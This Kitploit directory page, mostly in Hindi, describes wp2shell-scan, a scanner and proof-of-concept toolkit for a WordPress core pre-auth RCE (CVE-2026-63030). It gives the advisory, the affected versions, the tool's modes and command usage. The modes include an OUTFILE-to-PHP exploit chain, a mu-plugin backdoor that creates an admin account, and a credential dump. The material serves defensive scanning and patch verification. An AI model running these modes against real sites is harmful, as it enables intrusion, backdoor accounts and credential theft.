Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp2shell-scan — CVE-2026-63030 (wp2shell) के लिए एक स्कैनर और प्रूफ-ऑफ-कॉन्सेप्ट टूलकिट - WordPress कोर में प्री-ऑथेंटिकेटेड रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/fullhunt/wp2shell-scan
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubfullhunt/wp2shell-scan

wp2shell-scan

CVE-2026-63030 (wp2shell) के लिए एक स्कैनर और प्रूफ-ऑफ-कॉन्सेप्ट टूलकिट - WordPress कोर में प्री-ऑथेंटिकेटेड रिमोट कोड निष्पादन

रिपॉजिटरी देखें
52312 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

wp2shell-scan

CVE-2026-63030 (wp2shell) के लिए एक स्कैनर और प्रूफ-ऑफ-कॉन्सेप्ट टूलकिट, जो WordPress कोर में एक प्री-ऑथेंटिकेटेड रिमोट कोड निष्पादन भेद्यता है

विशेषताएँ

  • दो गैर-विनाशकारी पता लगाने के तरीके: --check-type time-based (SLEEP टाइमिंग) और --check-type error-based (TRUE/FALSE/टूटा डिफरेंशियल)। दोनों व्यापक एस्टेट स्कैन के लिए सुरक्षित हैं।
  • एक ही रन में URL की सूचियों और एकाधिक लक्ष्यों के लिए समर्थन।
  • कंटेंट-आधारित बूलियन ओरेकल निष्कर्षण SLEEP, त्रुटि आउटपुट, या MySQL FILE विशेषाधिकारों के बिना काम करता है।
  • अविश्वसनीय बूलियन ओरेकल के लिए टाइमिंग-आधारित ब्लाइंड निष्कर्षण फॉलबैक।
  • REST एंडपॉइंट प्रोबिंग यह पता लगाने के लिए कि कौन से रूट इंजेक्शन को WP_Query तक पहुँचाते हैं।
  • पूर्ण एक्सप्लॉइट-चेन सत्यापन (SQLi → INTO OUTFILE → PHP निष्पादन), एक स्पष्ट --i-have-authorization फ़्लैग के पीछे गेटेड।
  • सुरक्षित, ऑफ़लाइन पुनरुत्पादन के लिए स्थानीय असुरक्षित टेस्टबेड (Docker)।

🚨 घोषणा (जुलाई 2026)

CVE-2026-63030 ("wp2shell") WordPress कोर में एक प्री-ऑथेंटिकेटेड रिमोट कोड निष्पादन भेद्यता है। REST API बैच एंडपॉइंट (/batch/v1) में एक रूट-कन्फ्यूजन / इंडेक्स-डीसिंक्रोनाइज़ेशन बग एक अप्रमाणित हमलावर को एक अनसैनिटाइज़्ड author_exclude मान को WP_Query में तस्करी करने देता है, जिसके परिणामस्वरूप SQL इंजेक्शन होता है। जहाँ डेटाबेस उपयोगकर्ता के पास FILE विशेषाधिकार है, यह SELECT ... INTO OUTFILE के माध्यम से रिमोट कोड निष्पादन की ओर ले जाता है। कोई प्लगइन आवश्यक नहीं है। एक स्टॉक WordPress इंस्टॉल प्रभावित है।

WordPress ने 6.9.5, 7.0.2, और 7.1-beta2 में फिक्स जारी किए। तुरंत पैच लगाएँ। यदि आपको अपने बुनियादी ढांचे पर इस भेद्यता को स्कैन करने या खोजने में सहायता की आवश्यकता है, तो [email protected] पर ईमेल करें। इसके बारे में fullhunt.io blog पर और पढ़ें।

शाखाअसुरक्षितठीक
6.96.9.0–6.9.46.9.5
7.07.0.0–7.0.17.0.2
7.17.1-beta17.1-beta2
< 6.9प्रभावित नहीं (बैच एंडपॉइंट मौजूद नहीं)—

विवरण

हम wp2shell (CVE-2026-63030) पर इसकी सार्वजनिक घोषणा के बाद से शोध कर रहे हैं, और हमने अपने ग्राहकों के साथ इस भेद्यता को रोकने के लिए काम किया है। हम CVE-2026-63030 की खोज और सत्यापन के लिए एक ओपन-सोर्स पता लगाने और स्कैन करने का उपकरण जारी कर रहे हैं। इसका उपयोग सुरक्षा टीमों द्वारा अपने बुनियादी ढांचे को wp2shell के लिए स्कैन करने और यह सत्यापित करने के लिए किया जाना चाहिए कि WAF नियम और पैच वास्तव में संगठन के वातावरण में हमले की श्रृंखला को अवरुद्ध करते हैं।

wp2shell-scan.py आठ मोड का समर्थन करने वाला एक एकल, एकीकृत स्कैनर है:

मोडउद्देश्यप्राधिकरण
checkगैर-विनाशकारी पता लगाना। दो जाँच प्रकार: --check-type time-based (SLEEP टाइमिंग प्रोब) या --check-type error-based (TRUE/FALSE/टूटा डिफरेंशियल)।नहीं
probe-endpointsपता लगाएं कि कौन से REST एंडपॉइंट इंजेक्शन को WP_Query तक पहुँचाते हैं।नहीं
probeN SQL पेलोड प्रतिक्रियाओं का साइड-बाय-साइड अंतर।नहीं
extractDB मेटाडेटा और हैश का बूलियन ओरेकल निष्कर्षण।हाँ
blindटाइमिंग-आधारित ब्लाइंड निष्कर्षण (जब बूलियन ओरेकल अविश्वसनीय हो तो फॉलबैक)।हाँ
exploitपूर्ण SQLi → INTO OUTFILE → PHP निष्पादन श्रृंखला को मान्य करें।हाँ
adduserएक mu-plugin बैकडोर लिखें जो एक व्यवस्थापक खाता बनाता है; बूलियन हैश निष्कर्षण पर वापस आता है।हाँ
get-usersसभी wp_users क्रेडेंशियल्स का बूलियन ओरेकल डंप।हाँ

नोट: प्राधिकरण कॉलम में 'हाँ' चिह्नित मोड के लिए --i-have-authorization फ़्लैग आवश्यक है।

उपयोग

$ python3 wp2shell-scan.py -h
usage: wp2shell-scan.py [-h] [-u URL] [-l USEDLIST] [-p PROXY]
                        [--check-type {time-based,error-based}] [-k]
                        [--timeout TIMEOUT] [--sleep SLEEP]
                        [--endpoint ENDPOINT] [--webroot PATH[,PATH...]]
                        [--out-name OUT_NAME] [--php-code PHP_CODE]
                        [--user-login USER_LOGIN] [--user-pass USER_PASS]
                        [--user-email USER_EMAIL] [--i-have-authorization]
                        [--sql LABEL:SQL] [--query QUERY] [--dump [KEY ...]]
                        [--all] [-v]
                        {check,probe-endpoints,probe,extract,blind,exploit,adduser,get-users}

CVE-2026-63030 (wp2shell) scanner: time-based / error-based checks, Boolean and blind extraction, authorized exploit validation.

positional arguments:
  {check,probe-endpoints,probe,extract,blind,exploit,adduser,get-users}
                        Scan mode.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  -p PROXY, --proxy PROXY
                        Send requests through proxy.
  --check-type {time-based,error-based}
                        Detection method for check mode - [Default: time-based].
  -k, --insecure        Disable TLS certificate verification.
  --timeout TIMEOUT     HTTP timeout (in seconds) - [Default: 15].
  --sleep SLEEP         SLEEP seconds for time-based checks and blind mode - [Default: 5].
  --endpoint ENDPOINT   REST endpoint used for the injection - [Default: /wp/v2/categories].
  --webroot PATH[,PATH...]
                        Server webroot for OUTFILE writes; repeatable - [Default: /var/www/html].
  --out-name OUT_NAME   Dropped filename - [Default: random].
  --php-code PHP_CODE   PHP written as the OUTFILE row terminator - [Default: '<?php phpinfo(); ?>'].
  --user-login USER_LOGIN
                        Backdoor username for adduser mode - [Default: wpadmin].
  --user-pass USER_PASS
                        Backdoor password for adduser mode.
  --user-email USER_EMAIL
                        Backdoor email for adduser mode.
  --i-have-authorization
                        Required for exploit, adduser, get-users, extract, and blind modes.
  --sql LABEL:SQL       probe mode: repeatable label:sql payload pair.
  --query QUERY         extract/blind mode: custom SQL scalar query to extract.
  --dump [KEY ...]      extract mode: prebuilt query keys (comma or space separated); empty=user+db+version.
  --all                 extract mode: dump all prebuilt queries.
  -v, --verbose

टाइम-आधारित जाँच (गैर-विनाशकारी SLEEP टाइमिंग प्रोब)

$ python3 wp2shell-scan.py check -u https://wp.lab.local --check-type time-based

त्रुटि-आधारित जाँच (गैर-विनाशकारी TRUE / FALSE / टूटा डिफरेंशियल)

$ python3 wp2shell-scan.py check -u https://wp.lab.local --check-type error-based

URL की सूची स्कैन करें

$ python3 wp2shell-scan.py check -l urls.txt

पता लगाएं कि कौन से REST एंडपॉइंट इंजेक्टेबल हैं

$ python3 wp2shell-scan.py probe-endpoints -u https://wp.lab.local

बूलियन ओरेकल के माध्यम से डेटा निकालें (FILE विशेषाधिकार की आवश्यकता नहीं)

$ python3 wp2shell-scan.py extract -u https://wp.lab.local --i-have-authorization --dump user,database,version

पूर्ण RCE श्रृंखला को मान्य करें (केवल अधिकृत लक्ष्य)

$ python3 wp2shell-scan.py exploit -u https://wp.lab.local --i-have-authorization

स्थापना

$ pip3 install -r requirements.txt

Docker समर्थन

git clone https://github.com/fullhunt/wp2shell-scan.git
cd wp2shell-scan
sudo docker build -t wp2shell-scan .
sudo docker run -it --rm wp2shell-scan check -u https://wp.lab.local

स्थानीय परीक्षण वातावरण

सुरक्षित, ऑफ़लाइन पुनरुत्पादन के लिए एक जानबूझकर असुरक्षित WordPress 7.0.1 + MariaDB वातावरण (FILE विशेषाधिकार प्रदान किया गया) शामिल है:

$ cd testbed
$ docker compose up -d
# Complete the WordPress setup wizard at http://localhost:8080, then:
$ python3 wp2shell-scan.py check -u http://localhost:8080

FullHunt के बारे में

टूल डाउनलोड करें